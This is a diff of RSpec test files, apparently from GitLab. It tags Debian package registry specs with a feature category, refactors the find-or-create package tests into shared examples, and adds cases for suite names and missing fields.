@ -59,11 +60,12 @@ RSpec.describe 'getting a work item list for a project', feature_category: :team
last_edited_at: 1.week.ago,
project: project,
labels: [label1, label2],
milestone: milestone2
milestone: milestone2,
author: reporter
)
expect { post_graphql(query, current_user: current_user) }.not_to exceed_all_query_limit(control)
expect_graphql_errors_to_be_empty
expect { post_graphql(query, current_user: current_user) }.not_to exceed_query_limit(control)
end
end

View File

@ -2,7 +2,7 @@
require 'spec_helper'
RSpec.describe Packages::Debian::CreateDistributionService do
RSpec.describe Packages::Debian::CreateDistributionService, feature_category: :package_registry do
RSpec.shared_examples 'Create Debian Distribution' do |expected_message, expected_components, expected_architectures|
let_it_be(:container) { create(container_type) } # rubocop:disable Rails/SaveBang

View File

@ -2,7 +2,7 @@
require 'spec_helper'
RSpec.describe Packages::Debian::CreatePackageFileService do
RSpec.describe Packages::Debian::CreatePackageFileService, feature_category: :package_registry do
include WorkhorseHelpers
let_it_be(:package) { create(:debian_incoming, without_package_files: true) }

View File

@ -1,10 +1,9 @@
# frozen_string_literal: true
require 'spec_helper'
RSpec.describe Packages::Debian::ExtractChangesMetadataService do
RSpec.describe Packages::Debian::ExtractChangesMetadataService, feature_category: :package_registry do
describe '#execute' do
let_it_be(:distribution) { create(:debian_project_distribution, codename: 'unstable') }
let_it_be(:incoming) { create(:debian_incoming, project: distribution.project) }
let_it_be(:incoming) { create(:debian_incoming) }
let(:source_file) { incoming.package_files.first }
let(:dsc_file) { incoming.package_files.second }

View File

@ -1,7 +1,7 @@
# frozen_string_literal: true
require 'spec_helper'
RSpec.describe Packages::Debian::ExtractDebMetadataService do
RSpec.describe Packages::Debian::ExtractDebMetadataService, feature_category: :package_registry do
subject { described_class.new(file_path) }
let(:file_name) { 'libsample0_1.2.3~alpha2_amd64.deb' }

View File

@ -1,7 +1,7 @@
# frozen_string_literal: true
require 'spec_helper'
RSpec.describe Packages::Debian::ExtractMetadataService do
RSpec.describe Packages::Debian::ExtractMetadataService, feature_category: :package_registry do
let(:service) { described_class.new(package_file) }
subject { service.execute }

View File

@ -2,7 +2,7 @@
require 'spec_helper'
RSpec.describe Packages::Debian::FindOrCreateIncomingService do
RSpec.describe Packages::Debian::FindOrCreateIncomingService, feature_category: :package_registry do
let_it_be(:project) { create(:project) }
let_it_be(:user) { create(:user) }

View File

@ -2,54 +2,57 @@
require 'spec_helper'
RSpec.describe Packages::Debian::FindOrCreatePackageService do
let_it_be(:distribution) { create(:debian_project_distribution) }
RSpec.describe Packages::Debian::FindOrCreatePackageService, feature_category: :package_registry do
let_it_be(:distribution) { create(:debian_project_distribution, :with_suite) }
let_it_be(:project) { distribution.project }
let_it_be(:user) { create(:user) }
let(:params) { { name: 'foo', version: '1.0+debian', distribution_name: distribution.codename } }
let(:service) { described_class.new(project, user, params) }
subject(:service) { described_class.new(project, user, params) }
let(:package) { subject.payload[:package] }
let(:package2) { service.execute.payload[:package] }
shared_examples 'find or create Debian package' do
it 'returns the same object' do
expect { subject }.to change { ::Packages::Package.count }.by(1)
expect(subject).to be_success
expect(package).to be_valid
expect(package.project_id).to eq(project.id)
expect(package.creator_id).to eq(user.id)
expect(package.name).to eq('foo')
expect(package.version).to eq('1.0+debian')
expect(package).to be_debian
expect(package.debian_publication.distribution).to eq(distribution)
expect { package2 }.not_to change { ::Packages::Package.count }
expect(package2.id).to eq(package.id)
end
context 'with package marked as pending_destruction' do
it 'creates a new package' do
expect { subject }.to change { ::Packages::Package.count }.by(1)
package.pending_destruction!
expect { package2 }.to change { ::Packages::Package.count }.by(1)
expect(package2.id).not_to eq(package.id)
end
end
end
describe '#execute' do
subject { service.execute }
let(:package) { subject.payload[:package] }
context 'with a codename as distribution name' do
let(:params) { { name: 'foo', version: '1.0+debian', distribution_name: distribution.codename } }
context 'run once' do
it 'creates a new package', :aggregate_failures do
expect { subject }.to change { ::Packages::Package.count }.by(1)
expect(subject).to be_success
expect(package).to be_valid
expect(package.project_id).to eq(project.id)
expect(package.creator_id).to eq(user.id)
expect(package.name).to eq('foo')
expect(package.version).to eq('1.0+debian')
expect(package).to be_debian
expect(package.debian_publication.distribution).to eq(distribution)
end
it_behaves_like 'find or create Debian package'
end
context 'run twice' do
let(:package2) { service.execute.payload[:package] }
context 'with a suite as distribution name' do
let(:params) { { name: 'foo', version: '1.0+debian', distribution_name: distribution.suite } }
it 'returns the same object' do
expect { subject }.to change { ::Packages::Package.count }.by(1)
expect { package2 }.not_to change { ::Packages::Package.count }
expect(package2.id).to eq(package.id)
end
context 'with package marked as pending_destruction' do
it 'creates a new package' do
expect { subject }.to change { ::Packages::Package.count }.by(1)
package.pending_destruction!
expect { package2 }.to change { ::Packages::Package.count }.by(1)
expect(package2.id).not_to eq(package.id)
end
end
it_behaves_like 'find or create Debian package'
end
context 'with non-existing distribution' do

View File

@ -2,7 +2,7 @@
require 'spec_helper'
RSpec.describe Packages::Debian::GenerateDistributionKeyService do
RSpec.describe Packages::Debian::GenerateDistributionKeyService, feature_category: :package_registry do
let(:params) { {} }
subject { described_class.new(params: params) }

View File

@ -1,7 +1,7 @@
# frozen_string_literal: true
require 'spec_helper'
RSpec.describe Packages::Debian::ParseDebian822Service do
RSpec.describe Packages::Debian::ParseDebian822Service, feature_category: :package_registry do
subject { described_class.new(input) }
context 'with dpkg-deb --field output' do

View File

@ -1,14 +1,14 @@
# frozen_string_literal: true
require 'spec_helper'
RSpec.describe Packages::Debian::ProcessChangesService do
RSpec.describe Packages::Debian::ProcessChangesService, feature_category: :package_registry do
describe '#execute' do
let_it_be(:user) { create(:user) }
let_it_be_with_reload(:distribution) { create(:debian_project_distribution, :with_file, codename: 'unstable') }
let_it_be_with_reload(:distribution) { create(:debian_project_distribution, :with_file, suite: 'unstable') }
let!(:incoming) { create(:debian_incoming, project: distribution.project) }
let(:package_file) { incoming.package_files.last }
let(:package_file) { incoming.package_files.with_file_name('sample_1.2.3~alpha2_amd64.changes').first }
subject { described_class.new(package_file, user) }
@ -27,11 +27,37 @@ RSpec.describe Packages::Debian::ProcessChangesService do
expect(created_package.creator).to eq user
end
context 'with existing package' do
let_it_be_with_reload(:existing_package) { create(:debian_package, name: 'sample', version: '1.2.3~alpha2', project: distribution.project) }
context 'with non-matching distribution' do
before do
existing_package.update!(debian_distribution: distribution)
distribution.update! suite: FFaker::Lorem.word
end
it { expect { subject.execute }.to raise_error(ActiveRecord::RecordNotFound) }
end
context 'with missing field in .changes file' do
shared_examples 'raises error with missing field' do |missing_field|
before do
allow_next_instance_of(::Packages::Debian::ExtractChangesMetadataService) do |extract_changes_metadata_service|
expect(extract_changes_metadata_service).to receive(:execute).once.and_wrap_original do |m, *args|
metadata = m.call(*args)
metadata[:fields].delete(missing_field)
metadata
end
end
end
it { expect { subject.execute }.to raise_error(ArgumentError, "missing #{missing_field} field") }
end
it_behaves_like 'raises error with missing field', 'Source'
it_behaves_like 'raises error with missing field', 'Version'
it_behaves_like 'raises error with missing field', 'Distribution'
end
context 'with existing package' do
let_it_be_with_reload(:existing_package) do
create(:debian_package, name: 'sample', version: '1.2.3~alpha2', project: distribution.project, published_in: distribution)
end
it 'does not create a package and assigns the package_file to the existing package' do

View File

@ -3,10 +3,11 @@ require 'spec_helper'
RSpec.describe Packages::Debian::ProcessPackageFileService, feature_category: :package_registry do
describe '#execute' do
let_it_be_with_reload(:distribution) { create(:debian_project_distribution, :with_file, codename: 'unstable') }
let_it_be_with_reload(:distribution) { create(:debian_project_distribution, :with_suite, :with_file) }
let!(:package) { create(:debian_package, :processing, project: distribution.project, published_in: nil) }
let(:distribution_name) { distribution.codename }
let(:component_name) { 'main' }
let(:debian_file_metadatum) { package_file.debian_file_metadatum }
subject { described_class.new(package_file, distribution_name, component_name) }
@ -42,6 +43,12 @@ RSpec.describe Packages::Debian::ProcessPackageFileService, feature_category: :p
context 'when there is no matching published package' do
it_behaves_like 'updates package and package file'
context 'with suite as distribution name' do
let(:distribution_name) { distribution.suite }
it_behaves_like 'updates package and package file'
end
end
context 'when there is a matching published package' do
@ -109,6 +116,34 @@ RSpec.describe Packages::Debian::ProcessPackageFileService, feature_category: :p
end
end
context 'without distribution name' do
let!(:package_file) { create(:debian_package_file, without_loaded_metadatum: true) }
let(:distribution_name) { '' }
it 'raises ArgumentError', :aggregate_failures do
expect(::Packages::Debian::GenerateDistributionWorker).not_to receive(:perform_async)
expect { subject.execute }
.to not_change(Packages::Package, :count)
.and not_change(Packages::PackageFile, :count)
.and not_change(package.package_files, :count)
.and raise_error(ArgumentError, 'missing distribution name')
end
end
context 'without component name' do
let!(:package_file) { create(:debian_package_file, without_loaded_metadatum: true) }
let(:component_name) { '' }
it 'raises ArgumentError', :aggregate_failures do
expect(::Packages::Debian::GenerateDistributionWorker).not_to receive(:perform_async)
expect { subject.execute }
.to not_change(Packages::Package, :count)
.and not_change(Packages::PackageFile, :count)
.and not_change(package.package_files, :count)
.and raise_error(ArgumentError, 'missing component name')
end
end
context 'with package file without Debian metadata' do
let!(:package_file) { create(:debian_package_file, without_loaded_metadatum: true) }
let(:component_name) { 'main' }

View File

@ -2,7 +2,7 @@
require 'spec_helper'
RSpec.describe Packages::Debian::SignDistributionService do
RSpec.describe Packages::Debian::SignDistributionService, feature_category: :package_registry do
let_it_be(:group) { create(:group, :public) }
let(:content) { FFaker::Lorem.paragraph }

View File

@ -2,7 +2,7 @@
require 'spec_helper'
RSpec.describe Packages::Debian::UpdateDistributionService do
RSpec.describe Packages::Debian::UpdateDistributionService, feature_category: :package_registry do
RSpec.shared_examples 'Update Debian Distribution' do |expected_message, expected_components, expected_architectures, component_file_delta = 0|
it 'returns ServiceResponse', :aggregate_failures do
expect(distribution).to receive(:update).with(simple_params).and_call_original if expected_message.nil?

View File

@ -428,7 +428,6 @@
- './ee/spec/features/projects/merge_requests/user_edits_merge_request_spec.rb'
- './ee/spec/features/projects/milestones/milestone_spec.rb'
- './ee/spec/features/projects/mirror_spec.rb'
- './ee/spec/features/projects/navbar_spec.rb'
- './ee/spec/features/projects/new_project_from_template_spec.rb'
- './ee/spec/features/projects/new_project_spec.rb'
- './ee/spec/features/projects/path_locks_spec.rb'
@ -6124,7 +6123,6 @@
- './spec/lib/gitlab/ci/status/success_warning_spec.rb'
- './spec/lib/gitlab/ci/status/waiting_for_resource_spec.rb'
- './spec/lib/gitlab/ci/tags/bulk_insert_spec.rb'
- './spec/lib/gitlab/ci/templates/5_minute_production_app_ci_yaml_spec.rb'
- './spec/lib/gitlab/ci/templates/auto_devops_gitlab_ci_yaml_spec.rb'
- './spec/lib/gitlab/ci/templates/AWS/deploy_ecs_gitlab_ci_yaml_spec.rb'
- './spec/lib/gitlab/ci/templates/flutter_gitlab_ci_yaml_spec.rb'
@ -7470,7 +7468,6 @@
- './spec/lib/sidebars/menu_spec.rb'
- './spec/lib/sidebars/panel_spec.rb'
- './spec/lib/sidebars/projects/context_spec.rb'
- './spec/lib/sidebars/projects/menus/analytics_menu_spec.rb'
- './spec/lib/sidebars/projects/menus/ci_cd_menu_spec.rb'
- './spec/lib/sidebars/projects/menus/confluence_menu_spec.rb'
- './spec/lib/sidebars/projects/menus/deployments_menu_spec.rb'

View File

@ -3,7 +3,7 @@
require 'spec_helper'
RSpec.shared_examples 'Debian Distributions Finder' do |factory, can_freeze|
let_it_be(:distribution_with_suite, freeze: can_freeze) { create(factory, suite: 'mysuite') }
let_it_be(:distribution_with_suite, freeze: can_freeze) { create(factory, :with_suite) }
let_it_be(:container) { distribution_with_suite.container }
let_it_be(:distribution_with_same_container, freeze: can_freeze) { create(factory, container: container ) }
let_it_be(:distribution_with_same_codename, freeze: can_freeze) { create(factory, codename: distribution_with_suite.codename ) }
@ -35,7 +35,7 @@ RSpec.shared_examples 'Debian Distributions Finder' do |factory, can_freeze|
context 'by suite' do
context 'with existing suite' do
let(:params) { { suite: 'mysuite' } }
let(:params) { { suite: distribution_with_suite.suite } }
it 'finds distribution by suite' do
is_expected.to contain_exactly(distribution_with_suite)
@ -61,7 +61,7 @@ RSpec.shared_examples 'Debian Distributions Finder' do |factory, can_freeze|
end
context 'with existing suite' do
let(:params) { { codename_or_suite: 'mysuite' } }
let(:params) { { codename_or_suite: distribution_with_suite.suite } }
it 'finds distribution by suite' do
is_expected.to contain_exactly(distribution_with_suite)

View File

@ -3,7 +3,7 @@
require 'spec_helper'
RSpec.shared_examples 'Debian Distribution' do |factory, container, can_freeze|
let_it_be(:distribution_with_suite, freeze: can_freeze) { create(factory, suite: 'mysuite') }
let_it_be(:distribution_with_suite, freeze: can_freeze) { create(factory, :with_suite) }
let_it_be(:distribution_with_same_container, freeze: can_freeze) { create(factory, container: distribution_with_suite.container ) }
let_it_be(:distribution_with_same_codename, freeze: can_freeze) { create(factory, codename: distribution_with_suite.codename ) }
let_it_be(:distribution_with_same_suite, freeze: can_freeze) { create(factory, suite: distribution_with_suite.suite ) }

View File

@ -76,9 +76,9 @@ RSpec.shared_examples 'Generate Debian Distribution and component files' do
.and change { component_file1.reload.updated_at }.to(current_time.round)
package_files = package.package_files.order(id: :asc).preload_debian_file_metadata.to_a
pool_prefix = 'pool/unstable'
pool_prefix = "pool/#{distribution.codename}"
pool_prefix += "/#{project.id}" if container_type == :group
pool_prefix += "/p/#{package.name}/#{package.version}"
pool_prefix += "/#{package.name[0]}/#{package.name}/#{package.version}"
expected_main_amd64_content = <<~EOF
Package: libsample0
Source: #{package.name}
@ -183,7 +183,7 @@ RSpec.shared_examples 'Generate Debian Distribution and component files' do
main_sources_sha256 = Digest::SHA256.hexdigest(expected_main_sources_content)
expected_release_content = <<~EOF
Codename: unstable
Codename: #{distribution.codename}
Date: Sat, 25 Jan 2020 15:17:18 +0000
Valid-Until: Mon, 27 Jan 2020 15:17:18 +0000
Acquire-By-Hash: yes
@ -205,6 +205,7 @@ RSpec.shared_examples 'Generate Debian Distribution and component files' do
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 0 main/debian-installer/binary-arm64/Packages
#{main_sources_sha256} #{main_sources_size} main/source/Sources
EOF
expected_release_content = "Suite: #{distribution.suite}\n#{expected_release_content}" if distribution.suite
check_release_files(expected_release_content)
end
@ -228,12 +229,13 @@ RSpec.shared_examples 'Generate Debian Distribution and component files' do
.and not_change { distribution.component_files.reset.count }
expected_release_content = <<~EOF
Codename: unstable
Codename: #{distribution.codename}
Date: Sat, 25 Jan 2020 15:17:18 +0000
Valid-Until: Mon, 27 Jan 2020 15:17:18 +0000
Acquire-By-Hash: yes
SHA256:
EOF
expected_release_content = "Suite: #{distribution.suite}\n#{expected_release_content}" if distribution.suite
check_release_files(expected_release_content)
end

View File

@ -2,8 +2,7 @@
require 'spec_helper'
RSpec.describe Packages::Debian::GenerateDistributionWorker, type: :worker,
feature_category: :package_registry do
RSpec.describe Packages::Debian::GenerateDistributionWorker, type: :worker, feature_category: :package_registry do
describe '#perform' do
let(:container_type) { distribution.container_type }
let(:distribution_id) { distribution.id }

View File

@ -2,12 +2,14 @@
require 'spec_helper'
RSpec.describe Packages::Debian::ProcessChangesWorker, type: :worker do
RSpec.describe Packages::Debian::ProcessChangesWorker, type: :worker, feature_category: :package_registry do
let_it_be(:user) { create(:user) }
let_it_be_with_reload(:distribution) { create(:debian_project_distribution, :with_file, codename: 'unstable') }
let_it_be_with_reload(:distribution) do
create(:debian_project_distribution, :with_file, codename: FFaker::Lorem.word, suite: 'unstable')
end
let(:incoming) { create(:debian_incoming, project: distribution.project) }
let(:package_file) { incoming.package_files.last }
let(:package_file) { incoming.package_files.with_file_name('sample_1.2.3~alpha2_amd64.changes').first }
let(:worker) { described_class.new }
describe '#perform' do

View File

@ -3,7 +3,7 @@
require 'spec_helper'
RSpec.describe Packages::Debian::ProcessPackageFileWorker, type: :worker, feature_category: :package_registry do
let_it_be_with_reload(:distribution) { create(:debian_project_distribution, :with_file, codename: 'unstable') }
let_it_be_with_reload(:distribution) { create(:debian_project_distribution, :with_file) }
let_it_be_with_reload(:package) do
create(:debian_package, :processing, project: distribution.project, published_in: nil)
end